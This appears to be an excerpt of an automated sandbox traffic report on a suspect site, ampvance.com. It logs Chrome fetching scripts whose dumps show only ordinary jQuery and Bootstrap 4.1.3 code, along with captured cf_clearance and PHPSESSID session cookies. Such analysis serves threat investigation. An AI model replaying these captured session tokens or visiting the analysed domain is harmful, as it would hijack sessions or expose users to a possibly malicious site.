                                                      2024-03-05 13:23:43 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 30 3b 77 68 69 6c 65 28 61 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 2c 68 2c 6a 2c 6b 2c 6c 2c 6f 2c 72 2c 73 2c 77 3d 62 26 26 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 78 3d 62 3f 62 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 64 3d 64 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 61 7c 7c 21 61 7c 7c 31 21 3d 3d 78 26 26 39 21 3d 3d 78 26 26 31 31 21 3d 3d 78 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c
                                                      Data Ascii: unction(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 2e 73 70 6c 69 74 28 22 7c 22 29 2c 65 3d 63 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 65 2d 2d 29 64 2e 61 74 74 72 48 61 6e 64 6c 65 5b 63 5b 65 5d 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 26 26 61 2c 64 3d 63 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 26 26 28 7e 62 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 2d 28 7e 61 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 3b 69 66 28 64 29 72 65 74 75 72 6e 20 64 3b 69 66 28 63 29 77 68 69 6c 65 28 63 3d 63 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 63 3d 3d 3d 62 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 61 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6c 61 28 61 29 7b 72 65 74 75 72 6e 20 66
                                                      Data Ascii: .split("|"),e=c.length;while(e--)d.attrHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return f
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 72 65 74 75 72 6e 20 63 3f 5b 63 5d 3a 5b 5d 7d 7d 2c 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75
                                                      Data Ascii: ementsByName||!n.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribu
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 22 2b 75 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 7d 29 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4c 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c
                                                      Data Ascii: "+u+"+*").length||q.push(".#.+[+~]")}),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabl
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6b 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e 73 68 69 66 74 28 63 29 3b 63 3d 62 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 68 2e 75 6e 73 68 69 66 74 28 63 29 3b 77 68 69 6c 65 28 67 5b 64 5d 3d 3d 3d 68 5b 64 5d 29 64 2b 2b 3b 72 65 74 75 72 6e 20 64 3f 6b 61 28 67 5b 64 5d 2c 68 5b 64 5d 29 3a 67 5b 64 5d 3d 3d 3d 76 3f 2d 31 3a 68 5b 64 5d 3d 3d 3d
                                                      Data Ascii: de,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?ka(g[d],h[d]):g[d]===v?-1:h[d]===


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.449779104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:43 UTC1140OUTGET /boot/048a11303f2c0b13c71de5123e30fffb65e71cdee6db2 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:43 UTC657INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:43 GMT
                                                      Content-Type: text/javascript
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hzkX3IUpLZJq8D0UaQdFHEeMB2byR3dI8Kb7F4SzmG9Pi3hGBBbpTQnAI98LOA0WbNWOX8SjQUeYIkbK6Ur1uPOOv9MShMKBA0AGf6EPP6%2Fs6uKutVPZS7CXcGMO5xI%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c14be524400-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:43 UTC712INData Raw: 37 64 32 31 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                      Data Ascii: 7d21/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2c 65 29 2c 6e 26 26 69 28 74 2c 6e 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 72 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 65 3d 65 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 6f 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62
                                                      Data Ascii: .prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Ob
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 29 3b 29 3b 72 65 74 75 72 6e 20 74 7d 2c 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 65 26 26 22 23 22 21 3d 3d 65 7c 7c 28 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7c 7c 22 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 67 65 74 54 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69
                                                      Data Ascii: tElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){i
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 28 74 29 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 43 6c 6f 73 65 45 76 65 6e 74 28 65 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 74 68 69 73 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 29 7d 2c 74 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 6f 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 74 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 65 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e
                                                      Data Ascii: getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 2e 62 74 6e 22 2c 4f 3d 7b 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 79 2b 45 2c 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 3a 28 53 3d 22 66 6f 63 75 73 22 29 2b 79 2b 45 2b 22 20 62 6c 75 72 22 2b 79 2b 45 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 74 6f 67 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 30 2c 65 3d 21 30 2c 6e 3d 6d 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74 28 41 29 5b 30 5d 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65
                                                      Data Ascii: .btn",O={CLICK_DATA_API:"click"+y+E,FOCUS_BLUR_DATA_API:(S="focus")+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=m(this._element).closest(A)[0];if(n){var i=this._element.querySele
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 2e 66 6e 5b 70 5d 3d 43 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 6b 29 2c 51 6e 3d 28 6a 3d 22 63 61 72 6f 75 73 65 6c 22 2c 4c 3d 22 2e 22 2b 28 48 3d 22 62 73 2e 63 61 72 6f 75 73 65 6c 22 29 2c 52 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 78 3d 28 50 3d 65 29 2e 66 6e 5b 6a 5d 2c 57 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 73 6c 69 64 65 3a 21 31 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 7d 2c 55 3d 7b 69 6e 74 65 72 76 61 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73
                                                      Data Ascii: tion(){return m.fn[p]=C,k._jQueryInterface},k),Qn=(j="carousel",L="."+(H="bs.carousel"),R=".data-api",x=(P=e).fn[j],W={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0},U={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",paus
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 68 69 73 2e 5f 73 6c 69 64 65 28 46 29 7d 2c 74 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 74 29 26 26 28 46 6e 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 7d 2c 74 2e 63 79 63 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c
                                                      Data Ascii: his._slide(F)},t.pause=function(t){t||(this._isPaused=!0),this._element.querySelector(et)&&(Fn.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 29 2c 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 54 4f 55 43 48 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 61 75 73 65 28 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 2c 35 30 30 2b 65 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 7d 29 29 7d 2c 74 2e 5f
                                                      Data Ascii: ion(t){return e.cycle(t)}),"ontouchstart"in document.documentElement&&P(this._element).on(Q.TOUCHEND,function(){e.pause(),e.touchTimeout&&clearTimeout(e.touchTimeout),e.touchTimeout=setTimeout(function(t){return e.cycle(t)},500+e._config.interval)}))},t._
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 73 29 2c 6c 3d 65 7c 7c 73 26 26 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 28 74 2c 73 29 2c 63 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 6c 29 2c 68 3d 42 6f 6f 6c 65 61 6e 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 3b 69 66 28 74 3d 3d 3d 71 3f 28 6e 3d 4a 2c 69 3d 5a 2c 72 3d 4b 29 3a 28 6e 3d 7a 2c 69 3d 47 2c 72 3d 4d 29 2c 6c 26 26 50 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 56 29 29 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3b 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 72 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 73 26 26 6c 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 30 2c 68 26 26
                                                      Data Ascii: s),l=e||s&&this._getItemByDirection(t,s),c=this._getItemIndex(l),h=Boolean(this._interval);if(t===q?(n=J,i=Z,r=K):(n=z,i=G,r=M),l&&P(l).hasClass(V))this._isSliding=!1;else if(!this._triggerSlideEvent(l,r).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 61 74 61 28 29 29 2c 72 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 22 29 3b 72 26 26 28 69 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 50 28 6e 29 2c 69 29 2c 72 26 26 50 28 6e 29 2e 64 61 74 61 28 48 29 2e 74 6f 28 72 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 31 2e 33 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 5d 29 2c 6f 7d 28 29 2c 50 28 64 6f 63 75 6d 65 6e 74 29 2e
                                                      Data Ascii: ata()),r=this.getAttribute("data-slide-to");r&&(i.interval=!1),o._jQueryInterface.call(P(n),i),r&&P(n).data(H).to(r),t.preventDefault()}}},s(o,null,[{key:"VERSION",get:function(){return"4.1.3"}},{key:"Default",get:function(){return W}}]),o}(),P(document).


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.449780104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:43 UTC1138OUTGET /js/048a11303f2c0b13c71de5123e30fffb65e71cdee6db3 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:43 UTC665INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:43 GMT
                                                      Content-Type: text/javascript
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nl9PDNISHIUGEm7EloUBWjEbyVE3tRAPJ%2FylrSytqE5OOPtfQI15RYueA0tJWrpcsisbPCtkBOFtFSDlx3%2F7U23wNsY9r%2F%2FxD%2Bq5AYvOxySEfjjwEBwTF7wsYoGKIP8%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c14bef842ea-EWR
                                                      alt-svc: h3=":443"; ma=86400
